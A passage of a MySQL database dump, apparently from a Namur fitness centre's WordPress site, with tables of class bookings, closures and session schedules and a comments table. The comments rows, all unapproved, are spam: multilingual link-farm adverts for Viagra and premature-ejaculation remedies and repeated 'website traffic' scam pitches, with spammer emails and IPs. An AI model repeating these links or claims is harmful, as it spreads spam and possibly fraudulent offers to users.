  `type_seance` varchar(250) NOT NULL,
  `nb_max_participant` int(11) NOT NULL,
  `complet` int(1) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `reservation_seance_complete`
--

INSERT INTO `reservation_seance_complete` (`id`, `salle`, `date`, `heure_debut`, `heure_fin`, `type_seance`, `nb_max_participant`, `complet`) VALUES
(219, 'CTR', '2017-07-05', '19h ', '19h30', 'Circuit training', 0, 1),
(220, 'CTR', '2017-09-26', '18h15', '18h45', 'Circuit Training', 0, 1),
(221, 'CTR', '2017-11-08', '20h30', '21h00', 'Circuit training', 0, 1),
(222, 'CTR', '2017-12-27', '18h45', '19h15', 'Circuit training', 0, 1);

-- --------------------------------------------------------

--
-- Structure de la table `reservation_seance_complete_bck`
--

CREATE TABLE `reservation_seance_complete_bck` (
  `id` int(11) NOT NULL,
  `salle` varchar(3) NOT NULL,
  `date` date NOT NULL,
  `heure_debut` varchar(5) NOT NULL,
  `heure_fin` varchar(5) NOT NULL,
  `type_seance` varchar(250) NOT NULL,
  `nb_max_participant` int(11) NOT NULL,
  `complet` int(1) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `reservation_seance_complete_bck`
--

INSERT INTO `reservation_seance_complete_bck` (`id`, `salle`, `date`, `heure_debut`, `heure_fin`, `type_seance`, `nb_max_participant`, `complet`) VALUES
(218, 'nam', '2016-12-28', '19h ', '19h30', 'Circuit training', 0, 1),
(219, 'nam', '2017-07-05', '19h ', '19h30', 'Circuit training', 0, 1),
(217, 'nam', '2016-12-28', '19h45', '20h15', 'Spécial Sportif ', 0, 1),
(196, 'nam', '2016-03-30', '17h30', '18h', 'TRX Suspension Training', 0, 1),
(216, 'nam', '2016-10-10', '19h30', '20h00', 'Circuit Training', 0, 1),
(212, 'nam', '2016-07-06', '19h45', '20h15', 'Circuit Training', 0, 1),
(213, 'nam', '2016-09-26', '19h30', '20h00', 'Circuit Training', 0, 1),
(214, 'nam', '2016-10-10', '19h30', '20h00', 'Circuit Training', 0, 1),
(215, 'nam', '2016-11-03', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)', 0, 1),
(197, 'nam', '2016-04-04', '17h30', '18h00', 'TRX Suspension Training', 0, 1),
(198, 'nam', '2016-04-04', '20h30', '21h00', 'Circuit Training', 0, 1),
(199, 'nam', '2016-04-05', '19h45', '20h30', 'Circuit Training', 0, 1),
(200, 'nam', '2016-04-14', '12h45', '13h15', 'Circuit training', 0, 1),
(201, 'nam', '2016-04-21', '12h45', '13h15', 'Circuit training', 0, 1),
(202, 'nam', '2016-04-28', '12h45', '13h15', 'Circuit training', 0, 1),
(203, 'nam', '2016-04-27', '17h30', '18h', 'TRX Suspension Training', 0, 1),
(204, 'nam', '2016-05-14', '10h15', '10h45', 'Circuit Niveau 1', 0, 1),
(205, 'nam', '2016-05-14', '10h50', '11h20', 'Circuit Niveau 2 A', 0, 1),
(206, 'nam', '2016-05-14', '11h30', '12h00', 'Circuit Niveau 2 B', 0, 1),
(207, 'nam', '2016-05-14', '12h05', '12h35', 'Circuit Niveau 3', 0, 1),
(208, 'nam', '2016-06-11', '10h30', '11h00', 'Circuit Niveau 1', 0, 1),
(209, 'nam', '2016-06-11', '11h05', '11h35', 'Circuit Niveau 2', 0, 1),
(210, 'nam', '2016-06-11', '11h40', '12h10', 'Circuit Niveau 3', 0, 1),
(211, 'nam', '2016-06-29', '19h45', '20h15', 'Circuit Training', 0, 1);

-- --------------------------------------------------------

--
-- Structure de la table `reservation_seance_exceptionnelle`
--

CREATE TABLE `reservation_seance_exceptionnelle` (
  `id` int(11) NOT NULL,
  `salle` varchar(3) NOT NULL,
  `date` date NOT NULL,
  `heure_debut` varchar(5) NOT NULL,
  `heure_fin` varchar(5) NOT NULL,
  `type_seance` varchar(250) NOT NULL,
  `nb_max_participant` int(11) NOT NULL,
  `complet` int(1) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `reservation_seance_exceptionnelle`
--

INSERT INTO `reservation_seance_exceptionnelle` (`id`, `salle`, `date`, `heure_debut`, `heure_fin`, `type_seance`, `nb_max_participant`, `complet`) VALUES
(124, 'CTR', '2018-03-14', '17h00', '21h00', 'Pas de séance!!', 0, 0),
(122, 'CTR', '2017-12-25', '17h00', '21h00', 'Noël : Pas de séance', 0, 0),
(123, 'CTR', '2018-01-08', '9h00', '22h00', 'Bowling Fermé', 0, 0);

-- --------------------------------------------------------

--
-- Structure de la table `reservation_seance_exceptionnelle_bck`
--

CREATE TABLE `reservation_seance_exceptionnelle_bck` (
  `id` int(11) NOT NULL,
  `salle` varchar(3) NOT NULL,
  `date` date NOT NULL,
  `heure_debut` varchar(5) NOT NULL,
  `heure_fin` varchar(5) NOT NULL,
  `type_seance` varchar(250) NOT NULL,
  `nb_max_participant` int(11) NOT NULL,
  `complet` int(1) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `reservation_seance_exceptionnelle_bck`
--

INSERT INTO `reservation_seance_exceptionnelle_bck` (`id`, `salle`, `date`, `heure_debut`, `heure_fin`, `type_seance`, `nb_max_participant`, `complet`) VALUES
(77, 'nam', '2015-03-27', '17h30', '19h', 'Cross training fermé: pas de cours', 0, 0),
(67, 'nam', '2014-11-11', '17h30', '20h30', 'Jour férié! pas de cours!', 0, 0),
(68, 'nam', '2014-12-24', '17h30', '20h30', 'Pas de cours! Joyeuses fêtes!', 0, 0),
(69, 'nam', '2014-12-25', '17h30', '20h30', 'Pas de cours! Joyeuses fêtes!', 0, 0),
(70, 'nam', '2014-12-26', '17h30', '20h30', 'Pas de cours! Joyeuses fêtes!', 0, 0),
(71, 'nam', '2014-12-31', '17h30', '20h30', 'Pas de cours! Joyeuses fêtes!', 0, 0),
(72, 'nam', '2015-01-01', '17h30', '20h30', 'Pas de cours! Joyeuses fêtes!', 0, 0),
(73, 'nam', '2015-01-02', '17h30', '20h30', 'Pas de cours! Joyeuses fêtes!', 0, 0),
(74, 'nam', '2015-01-12', '17h30', '20h30', 'Le bowling est fermé! Pas de cours de cross training', 0, 0),
(75, 'nam', '2015-03-24', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)', 16, 0),
(76, 'nam', '2015-04-02', '18h00', '20h00', 'MIX Cross Training (un mix de tous nos cours pendant 2h)', 16, 0),
(63, 'nam', '2014-09-11', '18h15', '19h ', 'Tests physiques', 10, 0),
(64, 'nam', '2014-09-11', '19h00', '19h45', 'Tests physiques', 10, 0),
(65, 'nam', '2014-09-11', '19h45', '20h30', 'Tests physiques', 10, 0),
(66, 'nam', '2014-09-11', '17h30', '18h00', 'Core', 8, 0),
(79, 'nam', '2015-04-06', '17h30', '20h30', 'Jour férié! pas de cours!', 0, 0),
(80, 'nam', '2015-04-10', '17h30', '20h30', 'Cross Training Center fermé! Pas de cours!', 0, 0),
(81, 'nam', '2015-04-30', '18h00', '0h00', 'Anniversaire Cross Training', 0, 0),
(82, 'nam', '2015-05-01', '17h30', '20h30', 'cross training fermé : jour férié ', 0, 0),
(83, 'nam', '2015-05-14', '17h30', '20h30', 'Pas de cours! Cross Traning Center fermé!', 0, 0),
(84, 'nam', '2015-05-15', '17h30', '20h30', 'Pas de cours! Cross Traning Center fermé!', 0, 0),
(85, 'nam', '2015-05-25', '17h30', '20h30', 'Jour férié! Cross training fermé ', 0, 0),
(86, 'nam', '2015-06-02', '18h30', '19h30', 'Cross Training Center OUTDOOR à la citadelle de Namur', 20, 0),
(87, 'nam', '2015-06-18', '18h30', '19h30', 'Cross training outdoor àla citadelle de Namur ', 20, 0),
(88, 'nam', '2015-06-12', '17h30', '20h30', 'Cross Training Center fermé! Pas de cours!', 0, 0),
(89, 'nam', '2015-06-27', '10h30', '11h30', 'Cross Training OUTDOOR interval training course + renforcement musculaire', 20, 0),
(90, 'nam', '2015-06-27', '10h30', '11h30', 'Cross Training OUTDOOR Renforcement musculaire', 20, 0),
(91, 'nam', '2015-07-09', '18h30', '19h30', 'Cross Training OUTDOOR (ravel saint-servais)', 20, 0),
(92, 'nam', '2015-07-20', '17h30', '20h30', 'Bowling et Squash fermé : pas de cours de cross training', 0, 0),
(93, 'nam', '2015-08-06', '18h30', '19h30', 'Cross training outdoor saint-servais', 20, 0),
(94, 'nam', '2015-08-31', '17h30', '18h ', 'Circuit training ', 8, 0),
(95, 'nam', '2015-08-31', '18h15', '18h45', 'Circuit training ', 8, 0),
(96, 'nam', '2015-08-31', '19h', '19h30', 'Circuit training', 8, 0),
(97, 'nam', '2015-08-31', '19h45', '20h30', 'BodyBoxe', 8, 0),
(98, 'nam', '2015-09-21', '17h30', '20h30', 'Le Bowling est fermé à l\'occasion des fêtes de Wallonie! Pas de cours!', 0, 0),
(99, 'nam', '2015-11-27', '17h30', '18h', 'Circuit training ', 8, 0),
(100, 'nam', '2015-11-27', '18h', '18h30', 'Circuit training', 8, 0),
(101, 'nam', '2015-12-31', '17h30', '20h30', 'Pas cours! Joyeuses Fêtes', 0, 0),
(102, 'nam', '2015-12-24', '17h30', '20h30', 'Pas cours ! Joyeuses Fêtes', 0, 0),
(104, 'nam', '2016-03-28', '17:30', '21:00', 'Lundi de Pâques : pas de cours', 0, 0),
(105, 'nam', '2016-03-19', '14h00', '14h30', 'Circuit Niveau 1', 8, 0),
(106, 'nam', '2016-03-19', '14h40', '15h10', 'Circuit Niveau 2', 8, 0),
(107, 'nam', '2016-03-19', '15h15', '15h45', 'Circuit Niveau 3', 8, 0),
(108, 'nam', '2016-03-26', '10h00', '12h00', 'Pas de cours Bowling fermé', 0, 0),
(109, 'nam', '2016-09-19', '17h00', '21h00', 'Fêtes de Wallonie', 0, 0),
(111, 'nam', '2016-12-30', '18h15', '19h15', 'Séance Fin d\'Année 2016 ! :-)', 10, 0),
(112, 'nam', '2017-01-09', '17h00', '22h00', 'Bowling et Squash Fermé', 0, 0),
(113, 'nam', '2017-02-09', '18h30', '20h30', 'PAS COURS! Sandrine est en formation', 0, 0),
(114, 'nam', '2017-01-29', '18h00', '18h45', 'Jeudi oubli d\'encodage', 8, 0),
(115, 'nam', '2017-02-03', '8h00', '9h00', 'Séance jeudi 2/2 à 12h45', 10, 0),
(116, 'nam', '2017-02-17', '12h45', '13h15', 'Séance jeudi 16/2 à 12h45', 10, 0),
(117, 'nam', '2017-03-17', '10h00', '10h45', 'Rattrapage CAF 17/3', 8, 0),
(118, 'nam', '2017-03-01', '10h00', '11h00', 'Oubli inscription', 8, 0),
(119, 'nam', '2017-04-01', '10h00', '11h00', 'Oubli inscription', 8, 0),
(120, 'nam', '2017-04-08', '10h00', '11h00', 'Oubli encodage Train With Me', 8, 0);

-- --------------------------------------------------------

--
-- Structure de la table `reservation_seance_type`
--

CREATE TABLE `reservation_seance_type` (
  `id` int(11) NOT NULL,
  `salle` varchar(3) NOT NULL,
  `jour` varchar(250) NOT NULL,
  `heure_debut` varchar(5) NOT NULL,
  `heure_fin` varchar(5) NOT NULL,
  `type_seance` varchar(250) NOT NULL,
  `nb_max_participant` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `reservation_seance_type`
--

INSERT INTO `reservation_seance_type` (`id`, `salle`, `jour`, `heure_debut`, `heure_fin`, `type_seance`, `nb_max_participant`) VALUES
(134, 'nam', 'Lundi', '19h00', '20h00', 'Circuit Training (Julien)', 8),
(127, 'CTR', 'Jeudi', '19h30', '20h30', 'Circuit Training', 8),
(131, 'nam', 'Mercredi', '18h00', '19h00', 'Circuit Training (Damien)', 8),
(132, 'nam', 'Mercredi', '19h00', '20h00', 'Circuit Training (Damien)', 8),
(128, 'CTR', 'Jeudi', '20h30', '21h30', 'Circuit Training', 8),
(126, 'CTR', 'Jeudi', '18h30', '19h30', 'Circuit Training', 8),
(133, 'nam', 'Lundi', '18h00', '19h00', 'Circuit Training (Julien)', 8);

-- --------------------------------------------------------

--
-- Structure de la table `wp_commentmeta`
--

CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) UNSIGNED NOT NULL,
  `comment_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `wp_comments`
--

CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) UNSIGNED NOT NULL,
  `comment_post_ID` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT '',
  `comment_parent` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `user_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_comments`
--

INSERT INTO `wp_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(24, 1, 'Aevineeundurge', 'quohjaimai@fastmailforyou.net', 'http://americanwoodworker.com/blogs/judithtildam/pages/ginkgo-biloba-premature-ejaculation-how-long-is-a-man-supposed-to-last-in-bed-how-to-make-a-woman-last-longer-in-bed-how-to-help-a-guy-last-longe', '31.184.241.12', '2013-11-29 04:36:14', '2013-11-29 04:36:14', 'premature ejaculation while sleeping  <a href=\"http://joomlacode.org/gf/download/trackeritem/32712/122480/file80.html\" rel=\"nofollow\">how to last longer in missionary</a>  skuteczniej edetty  <a href=\"http://r-forge.r-project.org/tracker/download.php/103/458/5053/1927/causes-and-treatment-of-premature-ejaculation-how-to-last-really-long-in-bed-how-to-last-really-long-in-bed-for-men-meaning-of-premature-ejaculation-emla-cream-premature-ejaculation\" rel=\"nofollow\">meaning of premature ejaculation</a>  why do macs last longer than pcs  <a href=\"http://bleacherreport.com/users/3324026-do-older-men-last-longer\" rel=\"nofollow\">do older men last longer</a>  danida toolcenter  <a href=\"http://bleacherreport.com/users/3323966-how-to-fight-premature-ejaculation\" rel=\"nofollow\">solutions to premature ejaculation</a>  tocmoe proiectul  <a href=\"http://bleacherreport.com/users/3324785-how-to-delay-ejaculation-in-men-how-to-delay-ejaculation-in-men-naturally\" rel=\"nofollow\">is premature ejaculation genetic</a>  vater orasului beplankte  <a href=\"http://r-forge.r-project.org/tracker/download.php/103/458/5054/1930/problem-of-premature-ejaculation-ginger-and-premature-ejaculation-how-to-fix-premature-ejaculation-viagra-and-premature-ejaculation-viagra-for-premature-ejaculation\" rel=\"nofollow\">viagra for premature ejaculation</a>  breathing to prevent premature ejaculation do u last longer with condom on how to make your guy last longer in bed  <a href=\"http://joomlacode.org/gf/download/trackeritem/32712/122482/file78.html\" rel=\"nofollow\">how to last longer during intercourse for men</a>  monthly ruabookprint denigrazioni  <a href=\"http://r-forge.r-project.org/tracker/download.php/103/458/5046/1894/pills-for-men-to-last-longer-in-bed-how-can-a-man-stop-premature-ejaculation-what-do-women-think-about-premature-ejaculation-im-16-how-can-i-last-longer-in-bed-how-can-my-boyfriend-last-longer-in-bed\" rel=\"nofollow\">pills for men to last longer in bed</a>  prutului vezetokent renovar  <a href=\"http://r-forge.r-project.org/tracker/download.php/103/458/5058/1947/tricks-to-last-longer-sexually-exercise-to-stop-premature-ejaculation-best-way-to-stop-premature-ejaculation-does-viagra-stop-premature-ejaculation-how-can-you-stop-premature-ejaculation\" rel=\"nofollow\">does viagra stop premature ejaculation</a>  goculture hughston humr  <a href=\"http://joomlacode.org/gf/download/trackeritem/32706/122415/file16.html\" rel=\"nofollow\">pills for premature ejaculation in india</a>  bhawna feudal menutd  <a href=\"http://bleacherreport.com/users/3324026-do-older-men-last-longer\" rel=\"nofollow\">do black men last longer in bed</a>  rion opmerkelijke zarry  <a href=\"http://joomlacode.org/gf/download/trackeritem/32707/122433/file21.html\" rel=\"nofollow\">how to use kegel muscles to last longer</a>  \r\noldoklest modulares  <a href=\"http://www.tholos.biz/contatti.html\" rel=\"nofollow\">bundleslow beifeld </a>  chorfest cproc  <a href=\"http://gimnasium1.ax3.net/forum/posting.php?mode=post&amp;f=2\" rel=\"nofollow\">submarines usseglio </a>', 0, '0', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.11', '', 0, 0),
(25, 1, 'Ractstums', 'dihufoforaxi@nokiamail.com', '', '5.29.35.42', '2013-12-01 21:33:39', '2013-12-01 21:33:39', 'Nice man \r\n \r\n \r\n<a href=\"http://flavors.me/elmoredtc507\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/zachariasmcd527\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/carylbbz354\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/aubriefby619\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/orsontds763\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/agnellapme676\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/gatesrbe672\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/adlerccb583\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/jaquenetteklu208\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/ritchiepfa385\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/audijfb688\" rel=\"nofollow\">??????</a> \r\n<a href=\"http://flavors.me/jasonnbj222\" rel=\"nofollow\">??????</a> \r\n \r\nLesya2222sc', 0, '0', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; MRA 6.0 (build 6005); User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath', '', 0, 0),
(26, 1, 'Realallonry', 'miha@mail.ru', 'http://www.wow-level.ru', '178.151.216.52', '2013-12-02 08:54:43', '2013-12-02 08:54:43', 'Deniskrav \r\n \r\n<a href=\"http://passrealthestner70.webix.me\" rel=\"nofollow\">איך מפסיקים לעשן</a> \r\n<a href=\"http://bronectoimuf75.webix.me\" rel=\"nofollow\">הדרך הקלה להפסיק לעשן</a> \r\n<a href=\"http://chedistmongma87.webix.me\" rel=\"nofollow\">להפסיק לעשן</a> \r\n<a href=\"http://samrihelcapp64.webix.me\" rel=\"nofollow\">הפסקת עישון</a> \r\n<a href=\"http://tenranomoons67.webix.me\" rel=\"nofollow\">הפסקת עישון</a> \r\n<a href=\"http://gaisichestfor52.webix.me\" rel=\"nofollow\">גמילה מניקוטין</a> \r\n<a href=\"http://siotomosu83.webix.me\" rel=\"nofollow\">זריקה להפסקת עישון</a> \r\n<a href=\"http://pantgendheadsa62.webix.me\" rel=\"nofollow\">כדורים להפסקת עישון</a> \r\n<a href=\"http://jarlouronme65.webix.me\" rel=\"nofollow\">גמילה מסיגריות</a> \r\n<a href=\"http://himoselhand53.webix.me\" rel=\"nofollow\">גמילה מסיגריות</a> \r\n<a href=\"http://jackchapsstercom77.webix.me\" rel=\"nofollow\">להפסיק לעשן</a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0', '', 0, 0),
(27, 1, 'Ractstums', 'dihufoforaxi@nokiamail.com', '', '5.29.35.42', '2013-12-02 23:27:50', '2013-12-02 23:27:50', 'Nice man \r\n \r\n<a href=\"http://flavors.me/charissacts263\" rel=\"nofollow\">לויטרה</a> \r\n<a href=\"http://flavors.me/nonnahgtw296\" rel=\"nofollow\">גלולות ללא מרשם</a> \r\n<a href=\"http://flavors.me/clowmt280\" rel=\"nofollow\">קניית ויאגרה</a> \r\n<a href=\"http://flavors.me/sabawux511\" rel=\"nofollow\">לויטרה</a> \r\n<a href=\"http://flavors.me/cyntheahdr521\" rel=\"nofollow\">ויאגרה מחיר</a> \r\n<a href=\"http://flavors.me/suzanneyqt626\" rel=\"nofollow\">קניית ויאגרה</a> \r\n<a href=\"http://flavors.me/orsolabqi744\" rel=\"nofollow\">לויטרה</a> \r\n<a href=\"http://flavors.me/grangeuzu562\" rel=\"nofollow\">ויאגרה לנשים</a> \r\n<a href=\"http://flavors.me/bartolomeoedz210\" rel=\"nofollow\">לויטרה</a> \r\n<a href=\"http://flavors.me/alvisefl932\" rel=\"nofollow\">קניית ויאגרה</a> \r\n<a href=\"http://flavors.me/silvanusvwh128\" rel=\"nofollow\">לויטרה</a> \r\n<a href=\"http://flavors.me/drugio709\" rel=\"nofollow\">לויטרה</a> \r\n<a href=\"http://flavors.me/grayaxw078\" rel=\"nofollow\">שיפור התפקוד המיני</a> \r\n<a href=\"http://flavors.me/gregoriouxx914\" rel=\"nofollow\">סיאליס</a> \r\n<a href=\"http://flavors.me/geniaphd119\" rel=\"nofollow\">ויאגרה טבעית</a> \r\n<a href=\"http://flavors.me/korryyav418\" rel=\"nofollow\">ויאגרה טבעית</a> \r\n<a href=\"http://flavors.me/verineuev550\" rel=\"nofollow\">קניית ויאגרה</a> \r\n<a href=\"http://flavors.me/reiderffd277\" rel=\"nofollow\">ויאגרה טבעית</a> \r\n<a href=\"http://flavors.me/emmeryjmd330\" rel=\"nofollow\">סיאליס</a> \r\n<a href=\"http://flavors.me/tedmundezd457\" rel=\"nofollow\">ויאגרה ללא מרשם</a> \r\n<a href=\"http://flavors.me/nappiezuy694\" rel=\"nofollow\">ויאגרה</a> \r\n<a href=\"http://flavors.me/griffiemww665\" rel=\"nofollow\">ויאגרה טבעית</a> \r\n<a href=\"http://flavors.me/anastasiadxp974\" rel=\"nofollow\">גלולות ללא מרשם</a> \r\n<a href=\"http://flavors.me/sellenll203\" rel=\"nofollow\">ויאגרה טבעית</a> \r\n<a href=\"http://flavors.me/esmariaoko118\" rel=\"nofollow\">סיאליס</a> \r\n<a href=\"http://flavors.me/livydz584\" rel=\"nofollow\">ויאגרה ללא מרשם</a> \r\n<a href=\"http://flavors.me/uriahbby612\" rel=\"nofollow\">ויאגרה למכירה</a> \r\n<a href=\"http://flavors.me/noliedal235\" rel=\"nofollow\">ויאגרה מחיר</a> \r\n<a href=\"http://flavors.me/pierrettetvj985\" rel=\"nofollow\">ויאגרה לנשים</a> \r\n<a href=\"http://flavors.me/timieem853\" rel=\"nofollow\">מרשם לויאגרה</a> \r\n<a href=\"http://flavors.me/bettaquv191\" rel=\"nofollow\">ויאגרה מחיר</a> \r\n<a href=\"http://flavors.me/rollandzpr891\" rel=\"nofollow\">ויאגרה ללא מרשם</a> \r\n<a href=\"http://flavors.me/joelieofr517\" rel=\"nofollow\">ויאגרה ללא מרשם</a> \r\n<a href=\"http://flavors.me/leoinefbi165\" rel=\"nofollow\">ויאגרה ללא מרשם</a> \r\n<a href=\"http://flavors.me/carmellahgz112\" rel=\"nofollow\">ויאגרה מחיר</a> \r\n<a href=\"http://flavors.me/eastonslz716\" rel=\"nofollow\">גלולות ללא מרשם</a> \r\n<a href=\"http://flavors.me/willowfkm846\" rel=\"nofollow\">ויאגרה תופעות לוואי</a> \r\n<a href=\"http://flavors.me/loletaqir656\" rel=\"nofollow\">ויאגרה ללא מרשם</a> \r\n<a href=\"http://flavors.me/tanctq078\" rel=\"nofollow\">ויאגרה מחיר</a> \r\n<a href=\"http://flavors.me/gilwvn635\" rel=\"nofollow\">לויטרה</a> \r\n<a href=\"http://flavors.me/davidezvn963\" rel=\"nofollow\">ויאגרה ללא מרשם</a> \r\n<a href=\"http://flavors.me/melessanyb312\" rel=\"nofollow\">לויטרה</a> \r\n<a href=\"http://flavors.me/brycegnr658\" rel=\"nofollow\">ויאגרה</a> \r\n<a href=\"http://flavors.me/gailexwu214\" rel=\"nofollow\">ויאגרה מחיר</a> \r\n \r\nLesya2222sc', 0, '0', 'Opera/9.80 (Windows NT 6.1; WOW64; Edition Yx) Presto/2.12.388 Version/12.11', '', 0, 0),
(28, 1, 'ulyakovalchuk', 'gripersebounc@gmail.com', 'http://ori.kz', '46.119.115.223', '2013-12-03 22:45:57', '2013-12-03 22:45:57', 'http://ori.kz -  отдых + на островах греции', 0, '0', 'Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.10.289 Version/12.01', '', 0, 0),
(29, 1, 'mocovaGreesee', 'effeveexest@hotmail.com', 'http://www.temnie.asia/?page=MAHABANG+TULA+TUNGKOL+SA+KALUSUGAN', '41.77.1.32', '2013-12-06 23:57:09', '2013-12-06 23:57:09', 'Hartelijk dank , dat verlichten , en vooral, net op tijd . Stel je voor, al zes jaar op het internet , maar ik geloof dat het de eerste keer dat ik het hoor .', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11', '', 0, 0),
(30, 1, 'kamilasadova', 'hvilhvilin@gmail.com', 'http://nextonmarket.kz', '37.115.185.27', '2013-12-13 11:48:56', '2013-12-13 11:48:56', '<a href=\"http://studdom.kz\" rel=\"nofollow\">Визитки высококачественно и по самым доступным ценам</a>', 0, '0', 'Opera/9.80 (Windows NT 6.1; WOW64; MRA 8.0 (build 5784)) Presto/2.12.388 Version/12.10', '', 0, 0),
(31, 1, 'Britt', 'ottsjdvp@gmail.com', 'http://2hams.com/1612p', '151.237.180.10', '2013-12-16 17:29:07', '2013-12-16 17:29:07', 'We have made the decision to open our POWERFUL and PRIVATE website traffic system to the public for just a few days! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it needs. Visit us today: http://2hams.com/1612o', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(32, 1, 'Maria', 'ivqpfzsovuu@gmail.com', 'http://2hams.com/1612o', '151.237.177.85', '2013-12-18 14:52:27', '2013-12-18 14:52:27', 'You need targeted traffic to your website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their website traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Sign up before it is too late: http://2hams.com/1612n', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(33, 1, 'Karen', 'wgirsyzye@gmail.com', 'http://2hams.com/1612u', '151.237.177.85', '2013-12-21 00:48:31', '2013-12-21 00:48:31', 'We have decided to open our POWERFUL and PRIVATE website traffic system to the public for just a few days! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it deserves. Visit us today: http://2hams.com/1612n', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(34, 1, 'Linda', 'ypqtuza@gmail.com', 'http://2hams.com/1612o', '151.237.177.73', '2013-12-22 14:15:37', '2013-12-22 14:15:37', 'We have decided to open our POWERFUL and PRIVATE website traffic system to the public for a limited time! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it needs. Visit us today: http://2hams.com/1612p', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(35, 1, 'sabinakrylova', 'khvolsonkhvols@gmail.com', 'http://prostata.kz', '5.248.83.110', '2013-12-23 12:00:55', '2013-12-23 12:00:55', '<a href=\"http://nevropatolog.kz\" rel=\"nofollow\"> сколиоз грудного отдела упражнения </a>', 0, '0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.162 Safari/535.19', '', 0, 0),
(36, 1, 'Stacey', 'mgitremp@gmail.com', 'http://2hams.com/2312h', '151.237.180.11', '2013-12-24 08:45:25', '2013-12-24 08:45:25', 'We have decided to open our POWERFUL and PRIVATE website traffic system to the public for just a few days! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it needs. Visit us today: http://2hams.com/2312o', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
